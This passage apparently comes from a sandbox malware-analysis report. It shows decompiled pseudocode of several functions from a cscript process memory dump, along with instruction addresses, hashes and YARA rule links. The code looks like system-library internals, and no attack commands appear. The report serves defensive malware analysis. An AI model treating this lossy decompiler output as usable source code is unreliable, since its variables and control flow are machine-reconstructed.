					_pop(_t120);
					_pop(_t101);
					return E054FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x55a7b9c; // 0x0
					_t74 = L054D4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E054F9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L054D77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E054FF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E054F13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L054D77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E054F9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x054bc608
0x054bc615
0x054bc625
0x054bc62d
0x054bc635
0x054bc640
0x054bc680
0x054bc687
0x054bc688
0x054bc689
0x054bc694
0x054bc694
0x054bc642
0x054bc64a
0x054bc697
0x05527a25
0x05527a2b
0x05527a2e
0x05527a30
0x05527bea
0x05527bea
0x00000000
0x05527bea
0x05527a36
0x05527a43
0x05527a48
0x05527a4c
0x05527a4e
0x00000000
0x00000000
0x05527a58
0x05527a5a
0x05527a5b
0x05527a5c
0x05527a5d
0x05527a63
0x05527a64
0x05527a6a
0x05527a6c
0x05527a6e
0x055279cb
0x055279cb
0x055279ce
0x055279d0
0x05527a98
0x05527a9b
0x05527a9b
0x05527a9e
0x05527aa1
0x05527bbe
0x05527bbe
0x05527bc0
0x05527be0
0x05527be0
0x05527a01
0x05527a01
0x05527a05
0x05527a07
0x05527a15
0x05527a15
0x05527a1a
0x00000000
0x05527a1a
0x05527bc2
0x05527bc6
0x05527bc9
0x05527bcd
0x05527bcf
0x055279e6
0x055279e6
0x055279eb
0x055279eb
0x055279ef
0x055279f1
0x00000000
0x00000000
0x055279f3
0x055279f5
0x055279ff
0x055279ff
0x00000000
0x055279ff
0x055279f7
0x055279fd
0x00000000
0x00000000
0x00000000
0x055279fd
0x05527bd5
0x05527bd8
0x00000000
0x00000000
0x05527ba9
0x05527bac
0x05527bb0
0x05527bb1
0x05527bb1
0x05527bb6
0x00000000
0x05527bb6
0x05527aa7
0x05527aaa
0x00000000
0x00000000
0x05527ab2
0x05527ab3
0x05527ab5
0x05527aec
0x05527aef
0x05527b25
0x05527b28
0x05527b62
0x05527b64
0x05527b8f
0x05527b92
0x05527b96
0x05527b98
0x00000000
0x00000000
0x05527b9e
0x05527b9f
0x05527ba3
0x00000000
0x05527ba3
0x05527b66
0x05527b68
0x05527ae2
0x05527ae2
0x00000000
0x05527ae2
0x05527b6e
0x05527b72
0x05527b75
0x05527b81
0x05527b85
0x05527b87
0x00000000
0x00000000
0x05527b31
0x05527b34
0x05527b3c
0x05527b45
0x05527b46
0x05527b4f
0x05527b51
0x05527b57
0x05527b59
0x05527b59
0x00000000
0x05527b59
0x05527b77
0x00000000
0x05527b77
0x05527b2a
0x00000000
0x05527b2a
0x05527af1
0x05527af3
0x00000000
0x00000000
0x05527afb
0x05527afc
0x05527afe
0x00000000
0x00000000
0x05527b00
0x05527b03
0x00000000
0x00000000
0x05527b05
0x05527b09
0x05527b0d
0x05527b0f
0x00000000
0x00000000
0x05527b18
0x05527b1d
0x00000000
0x05527b1d
0x05527ab7
0x05527ab9
0x00000000
0x00000000
0x05527abf
0x05527ac1
0x00000000
0x00000000
0x05527ac3
0x05527ac6
0x00000000
0x00000000
0x05527ac8
0x05527acc
0x05527ad0
0x05527ad2
0x00000000
0x00000000
0x05527adb
0x00000000
0x05527adb
0x055279d6
0x055279d9
0x055279dc
0x05527a91
0x05527a94
0x00000000
0x05527a94
0x055279e2
0x00000000
0x055279e2
0x05527a74
0x05527a7a
0x00000000
0x00000000
0x05527a8a
0x05527a21
0x05527a21
0x00000000
0x05527a21
0x054bc650
0x054bc651
0x054bc656
0x054bc65c
0x054bc65d
0x054bc663
0x054bc664
0x054bc66a
0x054bc66e
0x055279c5
0x055279c7
0x00000000
0x055279c7
0x054bc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e871e1ced1f600cdc8c80f19ea07a29af8ec5ec1257c68f7449bbd36b759ef1a
Instruction ID: 7036112d0e70d10ad21b488057cc8db37c9c1eb2e65cc0391fa4aa7d71ccb790
Opcode Fuzzy Hash: e871e1ced1f600cdc8c80f19ea07a29af8ec5ec1257c68f7449bbd36b759ef1a
Instruction Fuzzy Hash: 30816F756282119BDB25CE14C880F7BB7E6FB8A360F14486EED459B681E330DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05536DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E05536DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L054D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E05536B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E054D7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E054F9AE0();
					_t87 = L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0553795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0553795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0553795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0553795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L054D4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E05536B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E05536B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E05536B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E05536B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E054D7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E054F9AE0();
								L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L054D2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L054D2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L054D2400( &_v52);
							}
							if(_v28 >= 0) {
								return L054D2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x05536dd4
0x05536dde
0x05536de1
0x05536de3
0x05536de6
0x05536de9
0x05536dec
0x05536def
0x05536df2
0x05536df5
0x05536dfe
0x05536e04
0x05536e09
0x05536e0d
0x05536e18
0x05536e1b
0x05536e22
0x05536e2d
0x05536e30
0x05536e36
0x05536e42
0x05536e4d
0x05536e50
0x05536e55
0x05536e5c
0x05536e6e
0x05536e5e
0x05536e67
0x05536e67
0x05536e73
0x05536e74
0x05536e77
0x05536e7c
0x05536e7d
0x05536e8e
0x05536e93
0x05536e9c
0x05536ea8
0x05536eab
0x05536eac
0x05536eb3
0x05536ecd
0x05536edc
0x05536ee2
0x05536ee5
0x05536ef2
0x05536efb
0x05536f01
0x05536f06
0x05536f0b
0x05536f11
0x05536f1a
0x05536f22
0x05536f26
0x05536f26
0x05536f33
0x05536f41
0x05536f44
0x05536f47
0x05536f54
0x05536f65
0x05536f77
0x05536f7c
0x05536f82
0x05536f91
0x05536f99
0x05536fa3
0x05536fae
0x05536fae
0x05536fba
0x05536fbb
0x05536fbc
0x05536fc1
0x05536fc2
0x05536fd3
0x05536fd8
0x05536fd8
0x05536fdf
0x05536fe8
0x05536fee
0x05536fee
0x05536ff5
0x05536ffb
0x05536ffb
0x05537004
0x00000000
0x0553700a
0x05537004
0x05536eb3
0x05536e9c
0x05537015

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 1d20f77c2a5031ac105daf7895104a8992d5c2b3af79449f2f9df68354d6bae7
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 60716F71E00619EFCB11DFA5C994AEEFBB9FF48710F104569E509E7250D734AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0554B8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0554B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x55a7b9c; // 0x0
				_t124 = L054D4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E054F9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E054F95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E054F95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L054D77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E054F9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E054F95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x55a7b9c; // 0x0
									_t92 = L054D4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E054F9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E054BA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0554E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0554E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E054F95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0554b8d9
0x0554b8e4
0x00000000
0x0554b8e6
0x0554b8f3
0x0554b8f5
0x0554b8f5
0x0554b8f8
0x0554b920
0x0554b924
0x0554b936
0x0554b939
0x0554b93d
0x0554b948
0x0554b9a0
0x0554b9a0
0x0554b9a4
0x0554b9bf
0x0554b9c4
0x0554b9c6
0x0554b9cd
0x0554b9d1
0x0554bad4
0x0554bad8
0x0554bada
0x0554badc
0x0554badc
0x0554badf
0x0554bae0
0x0554bae2
0x0554bae4
0x0554baec
0x0554baee
0x0554baf0
0x0554baf0
0x0554baec
0x0554bafb
0x0554bafc
0x0554bafe
0x0554bb01
0x0554bb01
0x00000000
0x0554bb06
0x0554b9d7
0x0554b9db
0x0554b9db
0x0554b9de
0x0554b9de
0x0554b9e4
0x0554b9e7
0x0554b9ea
0x0554b9ec
0x0554b9ef
0x0554b9f3
0x0554ba1b
0x0554ba1b
0x0554ba23
0x0554ba24
0x0554ba27
0x0554ba2a
0x0554ba2b
0x0554ba2e
0x0554ba30
0x0554ba37
0x0554ba3f
0x0554ba9c
0x0554baa2
0x0554bb13
0x0554bb15
0x0554baae
0x0554baae
0x0554bab3
0x0554bab5
0x0554baba
0x0554bac8
0x0554bac8
0x0554baba
0x0554bacd
0x0554bacf
0x00000000
0x0554bacf
0x0554bb1a
0x00000000
0x0554bb1c
0x0554baa7
0x0554bb11
0x00000000
0x0554bb11
0x0554baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0554ba41
0x0554ba41
0x0554ba41
0x0554ba58
0x0554ba5d
0x0554ba62
0x00000000
0x00000000
0x0554ba64
0x0554ba67
0x0554ba68
0x0554ba69
0x0554ba6c
0x0554ba6f
0x0554ba71
0x0554ba78
0x0554ba80
0x00000000
0x00000000
0x0554ba90
0x0554ba90
0x0554ba97
0x00000000
0x0554ba97
0x0554b9f5
0x0554b9f7
0x0554b9f7
0x0554b9fa
0x0554ba03
0x0554ba07
0x0554ba0c
0x0554ba10
0x0554ba17
0x00000000
0x0554b9f7
0x0554b9a6
0x0554b9a8
0x0554b9af
0x0554b9b3
0x00000000
0x00000000
0x0554b9b9
0x00000000
0x0554b9b9
0x0554b94d
0x0554b98f
0x0554b995
0x0554b999
0x0554b960
0x0554b967
0x0554b968
0x0554b96a
0x00000000
0x0554b96a
0x0554b99b
0x0554b99e
0x00000000
0x00000000
0x00000000
0x0554b99e
0x0554b951
0x0554b954
0x0554b95a
0x0554b95e
0x0554b972
0x0554b979
0x0554b97d
0x0554b97f
0x0554b980
0x0554b982
0x0554b984
0x00000000
0x0554b984
0x00000000
0x0554b926
0x00000000
0x0554b926

Memory Dump Source

Source File: 00000016.00000002.526980300.0000000005490000.00000040.00000001.sdmp, Offset: 05490000, based on PE: true

Associated: 00000016.00000002.527781335.00000000055AB000.00000040.00000001.sdmp Download File
Associated: 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5490000_cscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7081fdd574d00a6b0ab49a259c38ee7d1543992450feed411c421296ce7291b
Instruction ID: 2a2325942c09b7e3d1888adae38927622b945dd0ad0d4d2374095a5255d439db
Opcode Fuzzy Hash: e7081fdd574d00a6b0ab49a259c38ee7d1543992450feed411c421296ce7291b
Instruction Fuzzy Hash: 7C71E032200701AFDB21CF2AC849FAAB7B6FB44728F15492DE656876A0DB75E944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 054B52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E054B52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E054CEEF0(0x55a79a0);
					_t104 =  *0x55a8210; // 0x36b2b90
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x16000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E054CEB70(_t93, 0x55a79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E054F9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E054CEEF0(0x55a79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E054CEB70(0, 0x55a79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x6b2ba802
								_t13 = _t104 + 0xc; // 0x36b2b9d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E054EF0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E054CEEF0(0x55a79a0);
									__eflags =  *0x55a8210 - _t104; // 0x36b2b90
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x55a8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x20036b2b
											_t95 =  *((intOrPtr*)( *_t37));
											E05534888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E054CEB70(_t95, 0x55a79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E054F95D0();
											L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E054F95D0();
											L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E054CEB70(_t93, 0x55a79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E054F95D0();
										L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E054F95D0();
										L054D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x20036b2b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x6b2ba802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E054EF0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x054b52a5
0x054b52ad
0x054b52b0
0x054b52b3
0x054b52b7
0x054b52ba
0x054b52bf
0x054b52c4
0x054b52cc
0x00000000
0x00000000
0x054b52ce
